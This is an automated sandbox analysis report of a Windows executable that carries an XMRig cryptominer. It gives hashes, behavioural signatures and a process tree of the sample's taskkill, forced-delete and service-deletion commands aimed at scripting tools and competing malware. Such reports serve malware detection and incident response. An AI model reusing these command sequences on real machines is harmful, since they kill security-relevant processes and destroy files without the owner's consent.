Analysis
-
max time kernel
141s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
13-10-2022 07:44
Static task
static1
General
-
Target
baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe
-
Size
388KB
-
MD5
008529c86478f502614a904b6d582c19
-
SHA1
cfad60e56ec78bd7acb557bc4486e9f4ab0b8c79
-
SHA256
baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d
-
SHA512
eb4e697fb4d443b23f21613a68589482e700f60402988afa8ad08416bf81e76684b699e6549355f43e80b28e47b2d862c5be84570d9b4f896f4f316d038b135c
-
SSDEEP
6144:CxcIv8sDu4A+Oqp5UW9GtetZ5wZOTbNSubJyg+oiw4BHbz1qfOvlAkmQRFW:CxN5Duqzj9GsZGMn1yg+PwCHnVmQRFW
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe xmrig C:\Users\Admin\AppData\Local\Temp\sqlageatc.exe xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
sqlageatc.exepid process 1432 sqlageatc.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/552-133-0x0000000002390000-0x000000000239B000-memory.dmp upx behavioral1/memory/552-134-0x0000000002390000-0x000000000239B000-memory.dmp upx -
Launches sc.exe 30 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 3304 sc.exe 1692 sc.exe 1100 sc.exe 3000 sc.exe 2104 sc.exe 4556 sc.exe 1480 sc.exe 2780 sc.exe 3604 sc.exe 3520 sc.exe 3532 sc.exe 2424 sc.exe 4360 sc.exe 3476 sc.exe 2860 sc.exe 1980 sc.exe 2756 sc.exe 340 sc.exe 1816 sc.exe 4708 sc.exe 4228 sc.exe 5056 sc.exe 2540 sc.exe 4516 sc.exe 2000 sc.exe 4824 sc.exe 796 sc.exe 308 sc.exe 4676 sc.exe 1100 sc.exe -
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4360 taskkill.exe 3616 taskkill.exe 4052 taskkill.exe 4244 taskkill.exe 1980 taskkill.exe 3256 taskkill.exe 3912 taskkill.exe 2284 taskkill.exe 3592 taskkill.exe 1344 taskkill.exe 4672 taskkill.exe 3596 taskkill.exe 2324 taskkill.exe 1144 taskkill.exe 3444 taskkill.exe 4100 taskkill.exe 1816 taskkill.exe 3188 taskkill.exe 3476 taskkill.exe 3664 taskkill.exe 364 taskkill.exe 1244 taskkill.exe 4284 taskkill.exe 4356 taskkill.exe 3912 taskkill.exe 4260 taskkill.exe 3824 taskkill.exe 1816 taskkill.exe 2016 taskkill.exe 2176 taskkill.exe 3140 taskkill.exe 4944 taskkill.exe 4912 taskkill.exe 1980 taskkill.exe 3404 taskkill.exe 3476 taskkill.exe 4360 taskkill.exe 3220 taskkill.exe 3000 taskkill.exe 952 taskkill.exe 3820 taskkill.exe 1820 taskkill.exe 2916 taskkill.exe 4108 taskkill.exe 1708 taskkill.exe 3032 taskkill.exe 4260 taskkill.exe 1752 taskkill.exe 3296 taskkill.exe 4392 taskkill.exe 4832 taskkill.exe 1252 taskkill.exe 1712 taskkill.exe 3904 taskkill.exe 2208 taskkill.exe 2108 taskkill.exe 2208 taskkill.exe 3120 taskkill.exe 1424 taskkill.exe 1716 taskkill.exe 4052 taskkill.exe 4412 taskkill.exe 480 taskkill.exe 968 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exepid process 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 668 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeConhost.exetaskkill.execmd.exetaskkill.exetaskkill.execmd.exetaskkill.exetaskkill.exetaskkill.execmd.execmd.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 3592 taskkill.exe Token: SeDebugPrivilege 2108 taskkill.exe Token: SeDebugPrivilege 1564 taskkill.exe Token: SeDebugPrivilege 3628 taskkill.exe Token: SeDebugPrivilege 3000 taskkill.exe Token: SeDebugPrivilege 3264 taskkill.exe Token: SeDebugPrivilege 3336 taskkill.exe Token: SeDebugPrivilege 4244 taskkill.exe Token: SeDebugPrivilege 4260 taskkill.exe Token: SeDebugPrivilege 4832 taskkill.exe Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 3552 taskkill.exe Token: SeDebugPrivilege 3068 taskkill.exe Token: SeDebugPrivilege 3404 taskkill.exe Token: SeDebugPrivilege 3824 taskkill.exe Token: SeDebugPrivilege 1472 taskkill.exe Token: SeDebugPrivilege 1252 taskkill.exe Token: SeDebugPrivilege 1424 taskkill.exe Token: SeDebugPrivilege 3404 taskkill.exe Token: SeDebugPrivilege 1716 taskkill.exe Token: SeDebugPrivilege 1980 taskkill.exe Token: SeDebugPrivilege 1816 taskkill.exe Token: SeDebugPrivilege 3796 taskkill.exe Token: SeDebugPrivilege 4864 taskkill.exe Token: SeDebugPrivilege 2664 taskkill.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 3588 taskkill.exe Token: SeDebugPrivilege 2636 taskkill.exe Token: SeDebugPrivilege 2760 taskkill.exe Token: SeDebugPrivilege 4912 taskkill.exe Token: SeDebugPrivilege 3256 taskkill.exe Token: SeDebugPrivilege 968 Token: SeDebugPrivilege 3140 cmd.exe Token: SeDebugPrivilege 3656 taskkill.exe Token: SeDebugPrivilege 2324 taskkill.exe Token: SeDebugPrivilege 952 taskkill.exe Token: SeDebugPrivilege 3484 Conhost.exe Token: SeDebugPrivilege 3704 taskkill.exe Token: SeDebugPrivilege 4660 taskkill.exe Token: SeDebugPrivilege 4472 taskkill.exe Token: SeDebugPrivilege 3912 taskkill.exe Token: SeDebugPrivilege 796 taskkill.exe Token: SeDebugPrivilege 3640 taskkill.exe Token: SeDebugPrivilege 3584 taskkill.exe Token: SeDebugPrivilege 3032 taskkill.exe Token: SeDebugPrivilege 1816 taskkill.exe Token: SeDebugPrivilege 4360 Conhost.exe Token: SeDebugPrivilege 2284 taskkill.exe Token: SeDebugPrivilege 3140 cmd.exe Token: SeDebugPrivilege 4808 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 3120 cmd.exe Token: SeDebugPrivilege 1712 taskkill.exe Token: SeDebugPrivilege 4260 taskkill.exe Token: SeDebugPrivilege 3700 taskkill.exe Token: SeDebugPrivilege 3616 cmd.exe Token: SeDebugPrivilege 1652 cmd.exe Token: SeDebugPrivilege 3476 taskkill.exe Token: SeDebugPrivilege 4916 taskkill.exe Token: SeDebugPrivilege 2016 taskkill.exe Token: SeDebugPrivilege 1344 taskkill.exe Token: SeDebugPrivilege 3904 taskkill.exe Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 2632 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
sqlageatc.exepid process 1432 sqlageatc.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exepid process 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 552 wrote to memory of 4332 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 4332 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 4332 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 4332 wrote to memory of 3592 4332 cmd.exe taskkill.exe PID 4332 wrote to memory of 3592 4332 cmd.exe taskkill.exe PID 4332 wrote to memory of 3592 4332 cmd.exe taskkill.exe PID 552 wrote to memory of 1100 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 1100 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 1100 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 1100 wrote to memory of 2108 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 2108 1100 cmd.exe taskkill.exe PID 1100 wrote to memory of 2108 1100 cmd.exe taskkill.exe PID 552 wrote to memory of 4140 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 4140 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 4140 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 4140 wrote to memory of 1564 4140 cmd.exe taskkill.exe PID 4140 wrote to memory of 1564 4140 cmd.exe taskkill.exe PID 4140 wrote to memory of 1564 4140 cmd.exe taskkill.exe PID 552 wrote to memory of 3496 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3496 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3496 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 308 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 308 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 308 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 112 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 112 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 112 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3552 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3552 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3552 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3116 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3116 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3116 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 3116 wrote to memory of 3628 3116 cmd.exe taskkill.exe PID 3116 wrote to memory of 3628 3116 cmd.exe taskkill.exe PID 3116 wrote to memory of 3628 3116 cmd.exe taskkill.exe PID 552 wrote to memory of 1856 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 1856 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 1856 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 4860 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 4860 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 4860 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 528 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 528 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 528 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 5020 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 5020 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 5020 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 2368 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 2368 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 2368 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 2368 wrote to memory of 3000 2368 cmd.exe taskkill.exe PID 2368 wrote to memory of 3000 2368 cmd.exe taskkill.exe PID 2368 wrote to memory of 3000 2368 cmd.exe taskkill.exe PID 552 wrote to memory of 3636 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3636 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 3636 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 3636 wrote to memory of 3264 3636 cmd.exe taskkill.exe PID 3636 wrote to memory of 3264 3636 cmd.exe taskkill.exe PID 3636 wrote to memory of 3264 3636 cmd.exe taskkill.exe PID 552 wrote to memory of 1636 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 1636 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 1636 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe PID 552 wrote to memory of 2336 552 baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe"C:\Users\Admin\AppData\Local\Temp\baf3c75b14f9bf3e19c76aea7c612e75a13234340944c47549377e80badcfd2d.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im wscript.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wscript.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im SQLAGENTSWD.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SQLAGENTSWD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im exp1orer.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im exp1orer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/exp1orer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im expl0rer.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im expl0rer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\ProgramData\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Users\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:/RECYCLER/expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\RECYCLER\expl0rer.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im mshta.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mshta.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im powershell.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powershell.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im powershell.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powershell.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im WmiPrvSER.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WmiPrvSER.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\Help\WmiPrvSER.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\Help\WmiPrvSER.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Netsh_Help.dll2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Netsh_Help.dll3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\SysWOW64\Netsh_Help.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SysWOW64\Netsh_Help.dll2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im CGlobalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CGlobalan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %systemroot%\SystemCvlsa\CGlobalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Windows\SystemCvlsa\CGlobalan.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im CGlobalan.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CGlobalan.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "CVIDIA AlibabaProtect ClobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "CVIDIA AlibabaProtect ClobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete "CVIDIA AlibabaProtect ClobalSign"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "CVIDIA AlibabaProtect ClobalSign"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn64.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /f /im Gsmarn32.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Gsmarn32.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\Gsmarn32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt\*2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files (x86)\Microsoft BnibabsProt\Gsmarn32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q C:\Program Files\Microsoft BnibabsProt\Gsmarn32.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%Microsoft BnibabsProt00\Gsmarn64.exe2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c del /f /a /q %ProgramFiles%\Microsoft BnibabsProt00\*2⤵
-
